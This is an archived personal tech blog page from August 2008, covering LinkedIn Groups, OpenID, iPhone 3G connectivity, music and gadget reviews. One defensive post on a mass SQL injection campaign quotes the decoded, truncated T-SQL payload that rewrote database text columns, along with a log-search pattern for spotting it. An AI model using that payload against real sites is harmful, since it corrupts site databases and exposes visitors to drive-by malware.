Friday, 29 August 2008
As mentioned the other day, LinkedIn today released their new Groups features. Groups are one of the most popular features on LinkedIn, despite the limited feature-functionality provided for groups on the web site in the past.
The new features include a searchable contacts roster (search by name, company, or other keywords such as specific areas of expertise), which is accessible to all members; and discussions with email-digest notifications (which are configurable by individual group members). A few screen clips of the new functionality are shown below, and LinkedIn has published an informational page describing the new functionality.
Notification when you sign in that your managed group now has new features:
The new tabs available reflect the new functionality:
Choose your notification email delivery preferences for discussions:
Write a new discussion topic for the group:
Recent discussions list:
Vidoop Labs has a dream:
The dream is to see Identity baked into all browsers. Just imagine opening your web browser and then selecting your Identity Provider (IDP) the way you select your default search provider. The benefits are numerous; never type in a username, never look for a login button/page (you are authenticated when you land on a domain), no phishing/MITM (the browser can do domain and SSL cert validation). You fire up your browser and authenticate (or login) similar to the way you log in to your computer every time you turn it on. The difference is you get to choose your provider and can take control of the data you safeguard, store and share on the Internet.
I could get into that.
Vidoop is a Portland, Oregon company that has built some interesting technology around OpenID. I really like the idea of OpenID, and I have a couple OpenIDs of my own that I use on various sites. But OpenID is not exactly perfect. It's still relatively young, and from the usability standpoint it needs improvement. The identity and authentication requirements of the modern Internet demand some additional features and capabilities that OpenID doesn't deliver (and you can argue that it shouldn't). By combining openID with other technologies (such as Information Cards and other strong-auth offerings) and improving usability for end-users, it could become a widely-adopted, used and trusted standard, or part of a broader one covering strong authentication and identity protection/assertion in a commonly-accepted and deployed package.
Vidoop's Luke Sontag today posted an announcement that the company's newly-formed Vidoop Labs has fired up a community project called IDIB (pronounced "Eye-Dib"), which aims to improve on the OpenID usability model and make it stronger at the same time. They've released a developer preview of IDIB in hopes of involving people and getting your input and feedback.
From the Vidoop announcement:
Over the past few years we’ve seen the adoption of OpenID continue to increase but the work that we’ve done as a community to develop this technology has only just begun. Looking at the landscape of OpenID adoption, its clear that there are several key factors inhibiting adoption, but two that we want to focus on today, namely usability and security in the browser.
It was almost two years ago when the Firefox 3.0 roadmap wasannounced and OpenID was mentioned as a new component to the platform. The Mozilla Firefox team looked to members of the OpenID community to step up and provide guidance on what exactly we imagined identity in the browser looking like, but we failed to mobilize and answer their call.
In light of that missed opportunity, Vidoop Labs has been working hard over the last several weeks to produce a prototype that we intend to use to initiate a wider discussion about OpenID in the browser and what it might look like.
And the current developer preview (which is open-source) is just a beginning. Imagine leveraging Information Cards (such as one would use with Microsoft's CardSpace, or the similar open-source offerings for Mac and Linux) in the cloud, and being able to use OpenID - one logon for all your web sites - confidently, securely and with proper security protection.
The Internet needs a good, strong, reliable, usable and secure standard technology to solve the issues related to user names, passwords, single sign on and identity protection. IDIB looks like a serious and positive attempt to start the journey directly down that path.
Thursday, 28 August 2008
I thought I'd present some casual observations I made throughout the day Wednesday on a trip from Portland to Seattle, as well as some newly reported information about the AT&T 3G network that's hit the 'net over the past 24 hours or so.
The back-story here is that I - like many others - have found the reliability and consistency of the iPhone 3G to be less than satisfactory while on the 3G AT&T network.
First of all, it became clear to me over the course of several hours yesterday that the iPhone is not to blame with regards to connectivity on the 3G network. While driving from Portland, Oregon to Seattle, Washington and back yesterday, I had the opportunity to run a whole slew of speed/connectivity test sessions using the iPhone app called "iNetwork Test" (click here to get the free app in the iTunes App Store).
AT&T actually has fairly impressive 3G network coverage from south of Olympia, Washington practically all the way to Seattle, with one or two small gaps in-between where the phone switched to EDGE. Much of the area along that I-5 corridor is rural or sparsely-populated. From a wireless connectivity standpoint, it's a pretty decent area to live in if you're going to be far away from the city.
My experience in using the 3G network along my drive up and down the Interstate can be summed up thusly:
In areas with higher population density, and thus more iPhone (and other device) users, ability to a) connect to the voice network and make calls, b) stay connected to the voice network, c) make data connections and d) maintain data connections was substantially worse. The difference between dense and sparsely populated areas was like night and day.
Where population density was lower, even in cases when fewer bars are displayed on the signal strength icon, voice and data connections were reliable and solid without exception. In contrast, in high-population areas even full-signal connectivity was spotty and unreliable.
I'm running the latest iPhone software, v2.0.2, which both Apple and AT&T have encouraged people to upgrade to. AT&T even sent a text message to all users asking them to upgrade - a first-time action on the part of the carrier.
Some new information, part of which you'll find quoted below, helps explain why I experienced substantially poorer performance in the cities and heavily-populated areas but not in the rural sections of my drive. According to reports, it appears AT&T's 3G radio systems are power-constrained, and are not able to maintain all the connections. The incredible number of iPhone 3G devices on the network - especially in metropolitan and urban areas - is most certainly placing a heavy load on the radios. In addition, iPhone 3G devices that have not been updated to the v2.0.2 software are placing an even heavier burden on the radios from a power-consumption standpoint.
So, there's a power-management problem, as well as a capacity problem. When the network "noise" in the radio spectrum used gets to be higher, the towers have to increase power to try to overcome the noise. You can see how that doesn't work. Eventually the noise keeps climbing and the power consumption at the tower (and presumably on the iPhone as well) goes through the roof.
More towers would increase capacity, reduce power requirements and resulting noise, and generally improve coverage. But that's not something that can be changed overnight.
All of this helps explain why my ability to make calls, connect to the 3G data network and download at high speeds was much better where the network is only lightly used.
The Daily Tech site has a detailed report (and some intelligent reader comments) that describes the cell-site power issues, the problems related to the older iPhone 3G software, and other items. Go to the Daily Tech site to get all the details. Here is a portion of the information, including some text quoted from Roughly Drafted Magazine, whose author was able to get some new details from a source inside AT&T's wireless business describing the power issues and what the iPhone's v2.0.2 software update changes:
Basically the update "fixed power control on the mobile" according to the source. To understand what they're going to say next, you must first know a bit about AT&T's jargon for UMTS -- the technology it uses to deliver its 3G network. In the technology, phones are referred to as user equipment, "UE" for short. The base transceiver station towers are known as "Node B".
With this jargon in mind, the AT&T source explains:
"In UMTS power control is key to the mobile and network success. If the UE requires too much downlink power then the base station or Node B can run out of transmitter power and this is what was happening. As you get more UEs on the cell, the noise floor rises and the cell has to compensate by ramping up its power to the UEs. If the UE power control algorithm is faulty then they will demand more power from the cell than is necessary and with multiple users this can cause the cell transmitter to run out of power. The net result is that some UEs will drop their call. I have seen the dropped call graphs that correspond to the iPhone launch and when the 2.0.2 firmware was released. The increase in dropped calls, (were the result of) dropped calls due to a lack of downlink power."In essence, the iPhone is asking for a stronger signal than it needs. In areas with lots of users, some or all of whose phones are doing this, calls start to get dropped and signal quality drops. This all follows with the conclusions the media had reached -- the problems were somehow correlated to user distribution and seemed puzzlingly to be both with AT&T's network, and with the hardware.
The source continues:
"The power control issue will also have an effect on the data throughput, because the higher the data rate the more power the Node B transmitter requires to transmit. If the UEs have poor power control and are taking more power than is necessary then it will sap the network’s ability to deliver high speed data. This is one of the reasons why AT&T has been sending text messages to users to persuade them to upgrade to the 2.0.2 software. In a mixed environment where users are running 2.0, 2.0.1, and 2.0.2, the power control problems of 2.0 and 2.0.1 will affect the 2.0.2 users. It is not the network that is fault but the interaction of the bad power control algorithm in 2.0 and 2.0.1 software and the network that is at fault. The sooner everybody is running 2.0.2 software the better things will be. Having seen the graphs the 2.0.2 software has already started to make difference."Since transmitting lots of data takes lots of transmission power, and transmission power was unnecessarily being raised above that necessary for the use levels on phones, the network in areas of heavy use was unable to handle high speed data.
My first-generation Nikon D70, which I bought the day it was released to the market a few years back, died on me a few months ago. Without a card in it, it won't start, and when you insert a CF card in the slot, the green data-access indicator flashes on and off. If I hold down the Menu button, the menu flashes on and off along with the green LED.
As it turns out, this is a known problem with the original Nikon D70 cameras, and Nikon USA has a service bulletin out on the camera body. They'll repair it free of charge.
So, if you have the same problem, visit this service bulletin page, click on the D70, and you can access a PDF file that you'll need to print, fill out and send to Nikon along with your camera body. Be sure to take your camera strap off and remove the battery, and don't send any lenses or other accessories.
Mine's on it's way to Nikon now - they say the turnaround is five days (plus shipping time).
Wednesday, 27 August 2008
Well, this is a little embarrassing
. Intergalactic malware has made it's way into the news. A computer virus on the International Space Station. No AV software on the laptops they use, nor (apparently) is there a process of security checks on personal computer equipment like USB thumb drives carried by astronauts being rocketed to the International Space Station.
Granted, the virus in question in this case is pretty innocuous, and apparently other viruses that have made it into space aboard computer gear in the past (it's really quite difficult to mention that in passing) have also been more of an inconvenience than a real security threat.
But imagine a virus that might make its way on-board and do more damage. Not good. It looks like it's time for some effective process and possibly some basic security technology - You know, just in case.
The author of that virus has something new to brag about, though. That's for sure.
Now and then I think back to an old song, a not-quite-as-old television commercial, and a little league baseball "career" that happened years before. In each of our lives there's that song, that toy, that event, or what have you - Something from our past that somehow pulls us back, and returns our minds directly into a piece of our past that has some real meaning.
For me, one of those timeless reminders is a song and a Pizza Hut commercial from the early 90's. I recall seeing the commercial on TV, and it's on the old VHS video tape of the first Teenage Mutant Ninja Turtles movie. The song is called "Right Field," and it was originally performed by Peter, Paul and Mary (here's an iTunes link
for ya). I'm not sure who's singing in the Pizza Hut commercial, but the combination of the visuals and the music is priceless, and it just takes me back.
I think when I was much younger, I even looked a bit like that kid. Maybe a somewhat skinnier head, but close. Watching that commercial truly takes me back. I wasn't a great baseball player by any stretch of the imagination, but I truly enjoyed the game. I remember taking a couple fast pitches to the face, and standing in right (or left, or center) field, the ball high in the air and coming down at me. I was always at least a little amazed when it landed in my glove. I remember my best friends with me on the team and out on the field. The cottonwood fluff floating in the air, just like in the commercial. Lots of rubber bands, oil and a ball wrapped in a new glove, crammed under the truck tire overnight. And I remember, quite clearly, our dads (who were also our coaches) taking us to -- you guessed it -- the local Pizza Hut after games, where we pigged out (that's the term we used back then), belched a lot of soda bubbles, and generally had a great time. I remember playing Space Invaders and Asteroids and Missile Command on the table games there when they were brand new.
Years later as an adult, when the Pizza hut commercial was created I remember watching it with a couple of my foster sons. It was baseball season for them, and they loved it as much as I did. Of course, the fact that it was on the beginning of the Teenage Mutant Ninja Turtles video tape helped (since they loved that, too). I was helping coach by then. When the kids weren't around, I sometimes played the commercial over and over a few times. I know it sounds weird, but like I said - Each of us has those little things that truly take us back.
A lot of people don't realize the original song is one of many great songs by Peter, Paul and Mary. I have no idea who recorded the actual music used in the commercial spot. Many people also often don't realize there are additional verses. The final verse and chorus, with a minor modification, if what they used in the commercial. That's my favorite part, but the whole song is great and I think anyone who's a fan of the song would like to hear it or read the lyrics. Here's an iTunes link
. The original lyrics appear below, and I've added a bonus YouTube link -- video of PP&M performing the original song
Saturday summers, when I was a kid
We'd run to the schoolyard and here's what we did
We'd pick out the captains and we'd choose up the teams
It was always a measure of my self esteem
'Cuz the fastest, the strongest, played shortstop and first
The last ones they picked were the worst
I never needed to ask, it was sealed,
I just took up my place in right field.
Right field, its easy, you know.
You can be awkward and you can be slow
That's why I'm here in right field
Just watching the dandelions grow
Playing right field can be lonely and dull
Little leagues never have lefties that pull
I'd dream of the day they'd hit one my way
They never did, but still I would pray
That I'd make a fantastic catch on the run
And not lose the ball in the sun
And then I'd awake from this long reverie
And pray that the ball never came out to me
Right field, its easy, you know.
You can be awkward and you can be slow
That's why I'm here in right field
Just watching the dandelions grow
Off in the distance, the game's dragging on,
There's strikes on the batter, some runners are on.
I don't know the inning, I've forgotten the score.
The whole team is yelling and I don't know what for.
Then suddenly everyone's looking at me
My mind has been wandering; what could it be?
They point at the sky and I look up above
And a baseball falls into my glove!
Here in right field, its important you know.
You gotta know how to catch
You gotta know how to throw
That's why I'm here in right field
Just watching the dandelions grow!
A simpler time, not a worry in the world. Just a ball, a bat, a group of kids, a field and a few dandelions to distract some of us. We may never get back there in real life, but it's fun to revisit it from time to time in our minds.
I'm also reminded, strangely enough, of something that happened many years later. Several years ago I was in a conference room with my IT team, assembled as a panel to interview a candidate for a position on our IT help desk. We'd asked the common technical and background questions of the candidate, whose name was Aaron. We then threw a couple behavioral questions at him, including the classic, "Why are manhole covers round?" A semi-blank look came over Aaron's face, and after several moments he blurted out his answer: "Because Teenage Mutant Ninja Turtles like pizza???" I turned to the guy next to me and declared, "He's the guy." We hired him the next day. His other interview questions and excellent answers had a lot to do with that decision, but the pizza answer was really what made it stick for me. Anyone can answer technical questions. That answer was a classic. And for the record, he turned out to be a great hire, too.
Whether it's a song like "Right Field" or a movie ("Stand by Me" comes to mind) or something else, each of us has our memory triggers. I'm just glad YouTube has that old commercial online, so I don't have to buy a VHS player just to load up this old TMNT video tape that I still have on my shelf. I'm not even sure if it would play anymore, but one thing's for sure: I won't be getting rid of that old tape any time soon.
Tuesday, 26 August 2008
has started sending owners of certain LinkedIn Groups email letting them know that on Friday they'll be enabling a new discussions capability for group managers and members. A friend received the information for his LinkedIn group today, but I have not yet received it for the one I co-manage, PDX Tech
. So, it's not clear whether this is rolling out to all groups or just some.
The addition of this new Groups functionality is a great move. To date, people who manage LinkedIn groups have had very limited options in terms of how to enable networking and communication among their groups. One can manually export a delimited-text file in a few formats to let you send emails, but outside of that the group interaction model has been short-featured, and required use of outside services - a sloppy model at best.
In addition to the group discussions, they plan to release an enhanced, searchable membership roster capability. Earlier this summer they introduced a searchable Groups directory
. Positive changes appear to be happening.
Below are the details from the LinkedIn email.
First, thank you for managing your group on LinkedIn. We sincerely appreciate the time and effort you devote to your members, and we know they value it. Together you have made Groups one of the top features on LinkedIn.
This Friday, we will be adding several much-requested features to your group:
We're confident that these new features will spur communication, promote collaboration, and make your group more valuable to you and your members. We hope you can come by LinkedIn on Friday morning to check out the new functionality and get a group discussion going by posting a welcome message.
- Discussion forums: Simple discussion spaces for you and your members. (You can turn discussions off in your management control panel if you like.)
- Enhanced roster: Searchable list of group members.
- Digest emails: Daily or weekly digests of new discussion topics which your members may choose to receive. (We will be turning digests on for all current group members soon, and prompting them to set to their own preference.)
- Group home page: A private space for your members on LinkedIn.
The LinkedIn Groups Team
Monday, 25 August 2008
A couple of small, independent evaluations of the iPhone 3G's performance, which has been much maligned by many of it's customers (including me from time to time), have been published in the past day or so. The results are interesting to consider, especially side-by-side.
In the first test, Swedish tech site GP took their iPhone 3G to a super-fancy antenna test chamber
at a company called Bluetest, where they ran the iPhone through the highly technical paces along with a few other 3G phones for comparison purposes. Results are available on the GP site.
In the second test, Wired asked readers to participate in testing from the field
, where they gathered and submitted speed and other connectivity data with their own phones. Wired then analyzed, mapped and posted the results as well as the test data in complete raw format at their site.
In the end, what did the tests yield? Well, you should read them for yourself and draw your own conclusions, of course. But in a nutshell, here's my take on what they found:
- GP's antenna test found that the iPhone 3G's antenna performs as well as any of the other 3G phones tested.
- The Wired real-world network test found that the networks are often woefully underperforming, and that while speeds are typically faster than EDGE, the ability to connect to a 3G tower might be problematic at best.
So, does this mean Apple-provided software fixes may not be able to solve the iPhone's 3G woes? It seems that in the case of network performance where the number of "bars" showing on 3G is at the bottom of the scale yet a EDGE network has a strong signal, trading off could be done better by the phone. But what really needs to happen to solve the big-picture problem is better 3G coverage. My experience in several cities has been that 3G coverage is poor in many cases, and inconsistent at best. In fact, if the AT&T EDGE/2.5G network was not available as a fall-back (or maybe "call-back" is a better term, given the dropped call rate), AT&T would never be able to sell their service. The effective 3G network coverage just isn't good enough to stand on its own. And poor coverage combined with all those handoffs and network drops just mean more and more battery power being applied by the device to keep re-establishing it's 3G connectivity.
However, any software fixes for lockups, freezing and app crashes will require Apple taking action. One thing I've wondered lately: Are device/software hangs and crashes causing or somehow related to network connectivity issues? Could one be causing the other, at least part of the time? I have noticed locking/hanging in several apps while the iPhone tries to connect to the AT&T network (as evidenced by the simultaneous flurry of AT&T radio-speaker-dance noise that we've all become familiar with over the past several years).
Wednesday, 20 August 2008
I like to listen to my Pandora "stations" in the background while working on my laptop. I get frustrated when I accidentally close the web browser (often its in a hidden tab) or, even worse, click on a link soewhere and Safari, in all it's awesomeness and wisdomness, re-uses the window and kills the audio feed.
In hopes of finding a better way, I started searching for a Pandora widget for the Mac Dashboard (the layover-page that you can put any of a number of downloadable mini-apps on). Unfortunately, I didn't find anything. (Update - turns out there is a widget out there, but it's a memory hog and apparently has a few issues). So, rather than looking for someone else to do the work for me, I started to actually think about a solution I could build on my own.
After about 10 minutes, I remembered the nifty capability in Safari to define a "snipped" portion of a web page and make it a Widget on the OSX Dashboard. You use the little scissors icon in Safari to accomplish this. I started thinking about the Dashboard and how it works, and wondered if there was any way to have Pandora play in the background using a system (the Dashboard, that is) that appears to reload each app every time I launch it.
What the heck, worth a shot, right? Well, I found I could create a web-clip of Pandora's music player that would play my music. No big surprise there. Click on the image to see the widget full-size.
But when I exited the dashboard to go do some actual work, the music would quit.
I got curious though. Maybe someone had thought about the fact that web pages constantly change and play music and whatever else. I did the obvious: I clicked on the little (i) button in the lower right corner of the widget and it took me to the page where I can choose to make the widget look like it's torn from a piece of paper, or whatever. And, lo and behold, right there in the lower left, is a box that makes it appear you can uncheck it and make the audio play in the background, even when dashboard is not active. I've highlighted that box below.
Would it work? I unchecked the box, exited Dashboard, and the music kept on playing in the background. Problem solved! It turns out the default setting is to play web page audio only when Dashboard is active, so you have to toggle the setting to get what you want.
Any other ways to do this? My method works great, but I wonder if someone else came up with a different solution?
Monday, 18 August 2008
Boy Genius says iPhone software v2.0.2 is on it's way out the door this afternoon. In fact, I just checked in iTunes, and there it is.
All 248.7MB of it. The description in the iTunes UI says it contains bug fixes, and that's it. Here's hoping the performance and stability issues - especially related to 3G network performance and switching - are what they fixed in this release. I almost returned my phone the other day out of sheer frustration, and that's saying a lot, really.
Update: After a couple hours of on/off use, apps are notably more stable/snappier (at first I wondered if it was just my imagination, or a fresh restart effect - time will tell), and network performance is better. Where a 3G network with poor or broken signal would be selected before, now a strong EDGE network is selected by the phone. Apps don't seem to hang in places where they reliably (or maybe the better term would be "predictably") hung before the update. For example, the volume controls in almost every app used to not respond for periods of time. Now they work every time. Much less frustrating. There are no real changes in terms of ourward appearance and functionality.
Friday, 15 August 2008
I just made a change on the blog, so my main RSS feed links now point to FeedBurner. You should not need to do anything to use the new feed - it's automagical. As a result of this change, some people might see duplicates of past entries. It's a one-time change (I hope), so thanks for putting up with it.
If you happen to subscribe to the feed for any single posting category here, that feed URL is unchanged.
Wednesday, 13 August 2008
My knowledge and social integrity was called into question this evening (in an instant messaging group chat session) about a rule-related fact I declared to be true based on the Rules of Jinx. I've always considered the rules to be pretty straight forward, and we all know they are unflinchingly rigid, but I'm willing to accept that evidence is the best proof when someone questions you.
And what better evidence than an encyclopedia of "facts" made up by pretty much anyone who says they know what they're talking about? I went to Wikipedia, and the entry there about the rules of Jinx. I'm posting a portion of it here for easy future reference.
A jinx can be initiated when at least two people in casual conversation unintentionally say (or type, in the case of Internet jinx) the same word or phrase at the same time. If one of them (the "jinxer") yells "Jinx!" before any further conversation has begun, the other person (the "jinxee") is in a state of being "jinxed" and may not speak further until they are "released" from the jinx. The rules for what constitutes such a release vary. Traditionally, a jinx is ended when anyone speaks the jinxed person's name. However, a common variation says that only the jinxer can free the jinxee from their obligation to remain silent. (This is sometimes called a "private jinx" or "jinx personal lock".)
The game ends when either the jinxee is released from the jinx or when the jinxee "breaks" the jinx by speaking while in a state of being jinxed. In the latter case, the Jinxee loses the game and a penalty is exacted.
Simultaneous speaking that is planned or expected, such as during the recitation of the Pledge of Allegiance or during the singing of a song, is ineligible for a jinx to occur. A jinx may only follow a spontaneous and unexpected overlapping of conversation by both parties.
See the wikipedia article for penalties, variations and details about the Jinx Sequence.
Okay. Back to your regularly scheduled programming, already in progress...
Tuesday, 12 August 2008
A bunch of IT and web-app teams have lost a lot of sleep lately...
Over the past several days, a significant number (in the thousands) of web applications, some of them well-known and well-used, have fallen victim to a distributed SQL injection attack that takes advantage of weak or non-existent input validation to inject malicious HTML code that then performs a drive-by malware attack on unsuspecting visitors. Since visitors to your site trust it, if your site has been hacked they are more likely to allow the malware to install on their computer (especially if, for example, the malware is delivered in the form of a browser helper object or something along those lines).
The malware in question appears to steal WoW account information and insert a back-door (trojan) program on PCs it infects (among other things).
Web sites that do not properly validate all input - and by proper I mean trust nothing by default and only allow input that specifically matches what is appropriate - and which run on a Microsoft SQL server back-end (and possibly other database servers that use the same basic table structure) are at risk. I've observed web sites running on both Apache and IIS that have been hacked, the only common thread is SQL server (despite reports to the contrary).
About data validation...
I've personally spoken with people from a few companies who have had to contend with the fact that their sites were attacked in this manner over the past several days. In each case, they were utilizing a so-called "black-list" (or "deny-list" to be a little more appropriate) of bad input in their application logic. The problem with black-listing is the cases where you don't realize something should be on the list, or when new threats emerge. Instead, a white-list (or "allow-list") methodology requires you to specify what input is allowed. Your application won't change much over time. The threats will. Deny all by default,
it's the only safe way to go.
UPDATE: Neil Carpenter mentions in the comments here that he recently posted an excellent blog entry about using parametrized queries in SQL server, and he makes some great points. While input validation is a useful and often appropriate layer of security (not all apps are database-driven), solving this specific type of problem using his method is an important idea to look at and leverage. A layered conbination of both input validation (where it's practical and workable) and paramaterized queries is a good approach, in my opinion.
Secure Computing's TrustedSource (good site, read it) has some detail about the attack...
You'll see this in your web server logs (assuming you are logging, and you sure as heck better be - more on that later):
Which is a hex-encoded injection that, when translated, creates this SQL statement string (bad-guy address has been removed):
DECLARE @T varchar(255), @C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name, b.name from sysobjects a, syscolumns b where a.id=b.id and a.xtype=’u’ and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec(’update ['+@T+'] set ['+@C +']=['+@C+']+””>
To search your web server logs for any offending lines, look for "DECLARE" anywhere in the query string. That's a dead give-away. You'll find attacks from various unsurprising countries including North Korea and China (or at least what's where I have seen them coming from).
How to solve?
If you need a tactical approach to block this particular threat right now while you plan validation improvements, I'd recommend what many people are doing: Monitor all the input with your web server, and re-write the offending statements to something innocuous. That's a band-aid, but it can help in the short-term with this one particular need. In addition, you could use application-layer firewalls in from of your web server/farm to do the same thing. But neither of these approaches would be considered acceptable as a complete or permanent solution. You can certainly keep them in place after an app fix, as part of a layered security approach. But ultimately the site needs to be coded properly and not allow the bad input.
HP recently released a tool that you can use to check for SQL injection vulnerabilities specifically called Scrawlr. You can find it, and related information, here.
Scrawlr, developed by the HP Web Security Research Group in coordination with the MSRC, is short for SQL Injector and Crawler. Scrawlr will crawl a website while simultaneously analyzing the parameters of each individual web page for SQL Injection vulnerabilities. Scrawlr is lightning fast and uses our intelligent engine technology to dynamically craft SQL Injection attacks on the fly. It can even provide proof positive results by displaying the type of backend database in use and a list of available table names. There is no denying you have SQL Injection when I can show you table names!
If you are dealing with this attack or have related thoughts, please feel free to post in the comments with your experiences.
There are a lot of so-so iPhone apps out there, fun to use once or twice but not killer applications that you simply must have. DataCase
is a candidate for that latter classification. (Available via the app store
for iPhone and iPod Touch, $6.99)
The DataCase app allows you to copy files from your PC or Mac to the iPhone via the wireless network using a drag-and-drop method. Once on the iPhone you can view and use the files in mobile mode. There's support for MS Office formats, PDF, text, common images, HTML, plus any audio and video the iPhone OS would normally support.
It's pretty slick. I'm playing with it now and can see the real benefits of having a variety of key files, documents, etc. available on the mobile device any time I need them. One problem common to all iPhone apps is the fact that it has to be running in the foreground in order to access the app remotely - no background execution. Good thing I bought this 16GB iPhone eh?
Links: Veiosoft web site
and a review at TUAW
Wednesday, 06 August 2008
I'm a rural-living person who often consults people on how to get broadband Internet connectivity to their middle-of-nowhere homes. There's some good news for most of those people. HughesNet, the big guy in the satellite Internet service space operated by Hughes Network systems (no relation), has announced that later this month they will begin offering what they're calling the ElitePremium plan, with download speeds available as fast as 5 megabits per second (mbps). That's up there speed-wise with what many cable companies provide, and is easily a competitor to DSL speed capabilities. It'll be available to order on August 21st.
Satellite Internet has some inherent latency between the time a request is sent and the resulting data is fed to you, since the distance the signal travels, even at the speed of light, is pretty darned far. Many VPN systems have a difficult time on Satellite, also due to the time-shift latency. But the "start" delay is not huge, and once the "faucet is open," 5 mbps is pretty darned fast.
That's about five times the download speed I get on my Internet connection, which is an excellent terrestrial wireless offering from a local provider (which is Cascade Networks, if you happen to live in the Longview, Washington or Columbia County, Oregon areas). An antenna on my roof points at a tower on a mountain about 11 miles away, and that's the option I use.
So, more options and much faster speeds for us non-city-dwellers. Not a bad deal!
Saturday, 02 August 2008
Every now and then you'll discover a couple or few smaller apps that work well together, or alongside each other. The type of situation where you get the 2+2=5 effect. Individually both apps are great, but when used together they becomes something even more. "Two great tastes that taste great together," to borrow an old marketing phrase.
That's been the case for me with two iPhone apps - Shazam (iTunes store page) and Pandora (iTunes store page). Today I use them alongside each other. It's my hope that someday they will be able to communicate with each other and share information.
I've written about Pandora here before. It's a web app that happens to have an iPhone client as well, where you can start with music you like and it helps you find more music that fits your taste and style. You create channels, or stations, and the Pandora service selects similar music for your to hear, and you can fine tune as you go.
Shazam is another of those magical "wow" apps for the iPhone. I use it in the car when I hear a song I like. Rarely do I know the name of the song, or even the artist. But as it plays, I just tell Shazam to listen to a 12-second portion of the song (a process called "tagging"). It uploads the resulting data to the centralized service, and back comes all the information about the song - Artist, title, album, everything. It's really amazing, and in my experience 100% accurate. From there you can also find YouTube videos and launch into the iTunes store to buy the music you've tagged.
I'll often take the name of an artist I discover from Shazam and plug the info into Pandora and start listening there. It's a great way to quickly and relatively effortlessly drill down into new music I have never heard before, but it's music that I really like.
Now imagine if you could use Shazam to identify a song and then inside Shazam choose an option to create a channel based on that artist in Pandora. That would be awesome, truly awesome. I have no idea how "possible" it is, but I can hope. :)
On a similar note - meaning various apps that work great together - ReadWriteWeb published an article this past week with a list of apps that complement each other well (including my Shazam/Pandora combination).
My title for this post sort of spins the title of the article I want to point you to, aiming for the positive side of the coin. The article, which is entitled "The Top 5 Reasons Tech Execs Fail," provides a set of bullet-pointed thoughts that can be read as a list of what tech execs need to do in order to succeed. I happen to agree with the authors' assessment.
Here's the short version of Marty Abbott and Michael Fisher's five points, slightly altered to read as a list of positive attributes of a successful tech leader:
5. Ability to Build World Class Team
4. Ability to Execute
3. Ability to Lead/Motivate/Inspire
2. Ability to Manage Operationally
1. Displays and Uses Financial Acumen
The authors point out in their article, "... when technology executives fail, it is not because they lack an individual skill. It is because they lack an an adequate balance of the many technical, operational and leadership skills necessary to make them a complete manager."
Friday, 01 August 2008
You should listen to your online friends. They often have great ideas, like in this case. I was recently turned onto a simple but effective
alternative to bulky plastic cases and leather holsters for my new iPhone 3G. It's called the invisible SHIELD
. The product, simply put, is
pretty darned terrific. You hardly know it's there, and it protects
like crazy. You can also get invisibleSHIELD for the iPhone
Now, let me tell you right up front that when it comes time to "install" the shield on your phone, you'll need a clean work surface, a little patience, 12 to 24 hours to let your shield "cure" on the phone,
and the ability to read and follow some simple instructions. If you make sure you have those few key things taken care of, all will go well.
In the video below I show and abuse my iPhone 3G (the only one I own...) with an Invisible Shield installed. In the video you can see that there are a couple scratches under
the shield. Those came from a combination of iPhone and the keys in my pocket (before I ordered the invisibleSHIELD
. In fact it was those exact scratches, which I got the first day I had the phone, that prompted me to find a real, working anti-scratching solution.
I can highly recommend the Invisible Shield.
Full disclosure: Zagg (the manufacturer of the invisibleSHIELD
) doesn't know I am doing this review. I found their product all on my own based on a real need, and clicking on the advertisement below takes you to my link on their product site - If you buy something there I'll get a small chunk of the change you spend. If you don't like that idea, no problem - just go to zagg.com and click through to the iPhone 3G page (or whatever product you want to cover and protect - For me, my MacBook Air is next).
© Copyright 2013 Greg Hughes
This work is licensed under a Creative Commons License
This page was rendered at Tuesday, 05 March 2013 15:08:09 (Pacific Standard Time, UTC-08:00)
newtelligence dasBlog 2.1.8015.804
"Computers used to take up entire buildings, now they just take up our entire lives."
"So how do you know what is the right path to choose to get the result that you desire? And the honest answer is this... You won't. And accepting that greatly eases the anxiety of your life experience."
Syndication [XML] and .net Alerts
For lazy, highly-technical or enlightened people, get this site's content without the use of a web browser. I use FeedDemon
for this, but you can choose your own. Subscribe - click the icon for my feed
... or sign up for Microsoft Alerts to receive updates through your MSN Messenger, e-mail, or mobile device. Click the orange button thingie to sign up with your Passport account:
Drop me an email:
Add me to MSN Messenger
|October, 2012 (2)
|June, 2012 (1)
|November, 2011 (1)
|October, 2011 (7)
|July, 2011 (1)
|May, 2011 (1)
|April, 2011 (1)
|January, 2011 (2)
|December, 2010 (3)
|November, 2010 (2)
|October, 2010 (1)
|September, 2010 (1)
|July, 2010 (1)
|June, 2010 (13)
|May, 2010 (4)
|April, 2010 (10)
|February, 2010 (1)
|January, 2010 (2)
|December, 2009 (1)
|November, 2009 (2)
|September, 2009 (2)
|August, 2009 (1)
|July, 2009 (2)
|June, 2009 (4)
|May, 2009 (7)
|April, 2009 (3)
|March, 2009 (5)
|February, 2009 (1)
|January, 2009 (10)
|December, 2008 (7)
|November, 2008 (7)
|October, 2008 (18)
|September, 2008 (18)
|August, 2008 (18)
|July, 2008 (35)
|June, 2008 (16)
|May, 2008 (12)
|April, 2008 (16)
|March, 2008 (22)
|February, 2008 (32)
|January, 2008 (9)
|December, 2007 (6)
|November, 2007 (4)
|October, 2007 (19)
|September, 2007 (36)
|August, 2007 (19)
|July, 2007 (17)
|June, 2007 (16)
|May, 2007 (13)
|April, 2007 (11)
|March, 2007 (5)
|February, 2007 (14)
|January, 2007 (16)
|December, 2006 (16)
|November, 2006 (4)
|October, 2006 (23)
|September, 2006 (14)
|August, 2006 (21)
|July, 2006 (34)
|June, 2006 (25)
|May, 2006 (20)
|April, 2006 (20)
|March, 2006 (17)
|February, 2006 (34)
|January, 2006 (30)
|December, 2005 (23)
|November, 2005 (39)
|October, 2005 (30)
|September, 2005 (49)
|August, 2005 (31)
|July, 2005 (21)
|June, 2005 (35)
|May, 2005 (53)
|April, 2005 (54)
|March, 2005 (60)
|February, 2005 (27)
|January, 2005 (59)
|December, 2004 (70)
|November, 2004 (58)
|October, 2004 (55)
|September, 2004 (64)
|August, 2004 (53)
|July, 2004 (65)
|June, 2004 (50)
|May, 2004 (49)
|April, 2004 (26)
|March, 2004 (20)
|February, 2004 (26)
|January, 2004 (28)
|December, 2003 (12)
|October, 2003 (8)
|September, 2003 (11)
|August, 2003 (1)
On this page
Search and Translate this Site
Blog Posting Categories
| Scott Adams' Dilbert Blog
